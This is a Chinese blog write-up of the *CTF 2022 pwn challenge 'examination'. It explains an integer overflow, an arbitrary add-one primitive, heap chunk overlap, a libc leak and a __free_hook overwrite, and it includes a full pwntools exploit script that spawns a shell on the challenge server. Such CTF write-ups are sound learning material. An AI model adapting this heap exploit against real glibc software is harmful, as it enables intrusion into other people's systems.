<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="*ctf 2022 pwn examination复现">
<meta property="og:type" content="article">
<meta property="og:title" content="startctf2022-pwn-writeup">
<meta property="og:url" content="http://example.com/2022/06/13/startctf2022-pwn-writeup/index.html">
<meta property="og:site_name" content="Leof&#39;s blog">
<meta property="og:description" content="*ctf 2022 pwn examination复现">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://image-1306303065.cos.ap-nanjing.myqcloud.com/202304100918978.jpg">
<meta property="og:image" content="https://image-1306303065.cos.ap-nanjing.myqcloud.com/202304100918367.jpg">
<meta property="og:image" content="https://image-1306303065.cos.ap-nanjing.myqcloud.com/202304100918300.jpg">
<meta property="og:image" content="https://image-1306303065.cos.ap-nanjing.myqcloud.com/202304100918754.jpg">
<meta property="og:image" content="https://image-1306303065.cos.ap-nanjing.myqcloud.com/202304100918468.jpg">
<meta property="og:image" content="https://image-1306303065.cos.ap-nanjing.myqcloud.com/202304100919692.jpg">
<meta property="article:published_time" content="2022-06-13T04:18:47.000Z">
<meta property="article:modified_time" content="2023-04-10T01:19:12.395Z">
<meta property="article:author" content="Leof">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="startctf2022">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://image-1306303065.cos.ap-nanjing.myqcloud.com/202304100918978.jpg">

<link rel="canonical" href="http://example.com/2022/06/13/startctf2022-pwn-writeup/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>startctf2022-pwn-writeup | Leof's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Leof's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/06/13/startctf2022-pwn-writeup/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="Leof">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Leof's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          startctf2022-pwn-writeup
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-06-13 12:18:47" itemprop="dateCreated datePublished" datetime="2022-06-13T12:18:47+08:00">2022-06-13</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-04-10 09:19:12" itemprop="dateModified" datetime="2023-04-10T09:19:12+08:00">2023-04-10</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index"><span itemprop="name">pwn</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/writeup/" itemprop="url" rel="index"><span itemprop="name">writeup</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>*ctf 2022 pwn examination复现</p>
<span id="more"></span>

<h1 id="examination"><a href="#examination" class="headerlink" title="examination"></a>examination</h1><p><a target="_blank" rel="noopener" href="https://imgtu.com/i/XWen61"><img src="https://image-1306303065.cos.ap-nanjing.myqcloud.com/202304100918978.jpg" alt="XWen61.jpg"></a></p>
<p>64位保护全开</p>
<h2 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h2><p>程序分为两个用户，一个teacher一个student</p>
<p>teacher可以添加学生，给学生打分、评论以及开除学生</p>
<p>student可以查看评论，祈祷，等</p>
<h3 id="add-student"><a href="#add-student" class="headerlink" title="add_student"></a>add_student</h3><p><a target="_blank" rel="noopener" href="https://imgtu.com/i/XWnFG4"><img src="https://image-1306303065.cos.ap-nanjing.myqcloud.com/202304100918367.jpg" alt="XWnFG4.jpg"></a></p>
<p>最多可以添加7个学生，程序会calloc两块堆块，0x20的堆块为head、0x18的为info</p>
<p>head存放info结构体的地址，info结构体的内容为教师评分，分数，评论的大小，评论的内容</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">info</span>&#123;</span></span><br><span class="line">	<span class="type">int</span> number;</span><br><span class="line">	<span class="type">int</span> sorce;</span><br><span class="line">	<span class="type">int</span> review_size;</span><br><span class="line">	<span class="type">int</span>* review;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>然后head的地址存放在student数组中</p>
<h3 id="give-sorce"><a href="#give-sorce" class="headerlink" title="give_sorce"></a>give_sorce</h3><p><a target="_blank" rel="noopener" href="https://imgtu.com/i/XWumlj"><img src="https://image-1306303065.cos.ap-nanjing.myqcloud.com/202304100918300.jpg" alt="XWumlj.jpg"></a></p>
<p>这里v2是无符号整型，当<code>*(student_chunk[i] + 24LL) == 1</code>的时候进入if语句可造成整数溢出</p>
<p>要让这个地址的值为1只需要执行下面这个函数就行</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/XWQl7t"><img src="https://image-1306303065.cos.ap-nanjing.myqcloud.com/202304100918754.jpg" alt="XWQl7t.jpg"></a></p>
<h3 id="write-review"><a href="#write-review" class="headerlink" title="write_review"></a>write_review</h3><p><a target="_blank" rel="noopener" href="https://imgtu.com/i/XWQrNV"><img src="https://image-1306303065.cos.ap-nanjing.myqcloud.com/202304100918468.jpg" alt="XWQrNV.jpg"></a></p>
<p>如果原本有就直接覆盖，没有的话输入指定范围内的size然后分配堆块写入内容</p>
<h3 id="check-fo-review"><a href="#check-fo-review" class="headerlink" title="check_fo_review"></a>check_fo_review</h3><p><a target="_blank" rel="noopener" href="https://imgtu.com/i/XWmC3d"><img src="https://image-1306303065.cos.ap-nanjing.myqcloud.com/202304100919692.jpg" alt="XWmC3d.jpg"></a></p>
<p>如果分数大于0x59可以打印堆地址并让一个任意地址加1，这里利用give_sorce的整数溢出即可得到一个很大的分数用来泄露堆地址</p>
<h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h2><p>程序可以使任意地址加1，这里可以通过修改堆块的size来造成堆重叠然后泄露libc</p>
<p>先添加两个学生，第一个学生的评论开辟0x380的空间，第二个学生的评论开辟0xa0的空间，泄露第一个学生的地址并修改地址+0x49即第一个学生评论的size位的3为4</p>
<p>这样size位就从0x391变成了0x491，多出来的0x100刚好可以把第二个学生的评论区域全部包含进来，把第一个学生开除，这样0x491大小的堆块会被放入unsorted bin中，接着继续添加学生的话会从unsorted bin中切割</p>
<p>这里思路就很明确了，被释放的0x491的堆块包含了第二个学生的所有信息，添加第三个学生，把包含第二个学生的head和info申请出来，只剩评论区域在unsorted bin中，查看评论就能泄露libc了，不过这里要注意的是程序使用的是calloc函数，重新申请出来的堆块会被清空，所以要把第二个学生的所有信息都构造好</p>
<p>再次通过写第三个学生的评论将第一个学生的评论地址改成__free_hook并写入<code>/bin/sh</code></p>
<p>覆写第一个学生的评论改__free_hook为system最后开除第三个学生即可getshell</p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#io = process(&quot;./examination&quot;)</span></span><br><span class="line">libc = ELF(<span class="string">&quot;./libc-2.31.so&quot;</span>)</span><br><span class="line">io = remote(<span class="string">&quot;1.14.71.254&quot;</span>, <span class="number">28662</span>)</span><br><span class="line">context.log_level = <span class="string">&quot;debug&quot;</span></span><br><span class="line"><span class="comment">#gdb.attach(io)</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">selete</span>(<span class="params">role</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&lt;0.teacher/1.student&gt;: &quot;</span>, <span class="built_in">str</span>(role))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">number</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt;&gt; &quot;</span>, <span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;enter the number of questions: &quot;</span>, <span class="built_in">str</span>(number))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">give_score</span>():</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt;&gt; &quot;</span>, <span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">write_new_review</span>(<span class="params">idx, size, content</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt;&gt; &quot;</span>, <span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;which one? &gt; &quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;please input the size of comment: &quot;</span>, <span class="built_in">str</span>(size))</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;enter your comment:&quot;</span>, content)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">write_old_review</span>(<span class="params">idx, content</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt;&gt; &quot;</span>, <span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;which one? &gt; &quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;enter your comment:&quot;</span>, content)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">change_role</span>(<span class="params">choice</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt;&gt; &quot;</span>, <span class="string">b&#x27;5&#x27;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&lt;0.teacher/1.student&gt;: &quot;</span>, <span class="built_in">str</span>(choice))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">pray</span>():</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt;&gt; &quot;</span>, <span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">idx</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt;&gt; &quot;</span>, <span class="string">b&#x27;4&#x27;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;which student id to choose?&quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">set_id</span>(<span class="params">idx</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt;&gt; &quot;</span>, <span class="string">b&#x27;6&#x27;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;input your id: &quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">attack</span>():</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;choice&gt;&gt; &quot;</span>, <span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;reward! &quot;</span>)</span><br><span class="line">    heap = <span class="built_in">int</span>(io.recvuntil(<span class="string">b&quot;\n&quot;</span>, drop=<span class="literal">True</span>), <span class="number">16</span>)</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;add 1 to wherever you want! addr: &quot;</span>)</span><br><span class="line">    io.sendline(<span class="built_in">str</span>(heap + <span class="number">0x49</span>).encode().ljust(<span class="number">15</span>, <span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">    <span class="keyword">return</span> heap</span><br><span class="line">selete(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">1</span>)  <span class="comment">#0</span></span><br><span class="line">write_new_review(<span class="number">0</span>, <span class="number">0x380</span>, <span class="string">b&#x27;Leof&#x27;</span>)</span><br><span class="line"></span><br><span class="line">change_role(<span class="number">1</span>)</span><br><span class="line">set_id(<span class="number">0</span>)</span><br><span class="line">pray()</span><br><span class="line"></span><br><span class="line">change_role(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">1</span>)  <span class="comment">#1</span></span><br><span class="line">write_new_review(<span class="number">1</span>, <span class="number">0xa0</span>, <span class="string">b&#x27;Leof&#x27;</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">1</span>)  <span class="comment">#2</span></span><br><span class="line"></span><br><span class="line">give_score()</span><br><span class="line">change_role(<span class="number">1</span>)</span><br><span class="line">set_id(<span class="number">0</span>)</span><br><span class="line"><span class="comment">#pause()</span></span><br><span class="line">heap = attack()</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;heap: &quot;</span>, <span class="built_in">hex</span>(heap))</span><br><span class="line"></span><br><span class="line"><span class="comment">#leak libc</span></span><br><span class="line">change_role(<span class="number">0</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">1</span>)          <span class="comment">#      0x30 + 0x20</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x338</span> + p64(<span class="number">0x31</span>) + p64(heap + <span class="number">0x410</span>) + p64(<span class="number">0</span>) * <span class="number">4</span> + p64(<span class="number">0x21</span>) + p64(<span class="number">1</span>) + p64(heap + <span class="number">0x430</span>) + p64(<span class="number">6</span>)</span><br><span class="line">write_new_review(<span class="number">2</span>, <span class="number">0x388</span>, payload)</span><br><span class="line"><span class="comment">#pause()</span></span><br><span class="line">change_role(<span class="number">1</span>)</span><br><span class="line">set_id(<span class="number">1</span>)</span><br><span class="line">io.recvuntil(<span class="string">b&quot;&gt;&gt; &quot;</span>)</span><br><span class="line">io.sendline(<span class="string">b&quot;2&quot;</span>)</span><br><span class="line">io.recvuntil(<span class="string">b&quot;\n&quot;</span>)</span><br><span class="line">malloc_hook = u64(io.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>)) - <span class="number">96</span> - <span class="number">0x10</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;malloc_hook: &quot;</span>, <span class="built_in">hex</span>(malloc_hook))</span><br><span class="line">libcbase = malloc_hook - libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">sys_addr = libcbase + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">free_hook = libcbase + libc.sym[<span class="string">&#x27;__free_hook&#x27;</span>]</span><br><span class="line"></span><br><span class="line">change_role(<span class="number">0</span>)</span><br><span class="line">payload = <span class="string">b&#x27;/bin/sh\x00&#x27;</span> + <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x330</span> + p64(<span class="number">0x31</span>) + p64(heap + <span class="number">0x410</span>) + p64(<span class="number">0</span>) * <span class="number">4</span> + p64(<span class="number">0x21</span>) + p64(<span class="number">1</span>) + p64(free_hook) + p64(<span class="number">8</span>)</span><br><span class="line">write_old_review(<span class="number">2</span>, payload)</span><br><span class="line">write_old_review(<span class="number">1</span>, p64(sys_addr))</span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>






    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
              <a href="/tags/startctf2022/" rel="tag"># startctf2022</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/01/13/%E6%A0%88%E6%BA%A2%E5%87%BA%E5%8E%9F%E7%90%86/" rel="prev" title="栈溢出原理">
      <i class="fa fa-chevron-left"></i> 栈溢出原理
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/06/14/IO-FILE-leak/" rel="next" title="IO_FILE-leak">
      IO_FILE-leak <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#examination"><span class="nav-number">1.</span> <span class="nav-text">examination</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%A8%8B%E5%BA%8F%E5%88%86%E6%9E%90"><span class="nav-number">1.1.</span> <span class="nav-text">程序分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#add-student"><span class="nav-number">1.1.1.</span> <span class="nav-text">add_student</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#give-sorce"><span class="nav-number">1.1.2.</span> <span class="nav-text">give_sorce</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#write-review"><span class="nav-number">1.1.3.</span> <span class="nav-text">write_review</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#check-fo-review"><span class="nav-number">1.1.4.</span> <span class="nav-text">check_fo_review</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF"><span class="nav-number">1.2.</span> <span class="nav-text">利用思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exp"><span class="nav-number">1.3.</span> <span class="nav-text">exp</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Leof"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">Leof</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">19</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">17</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Leof</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
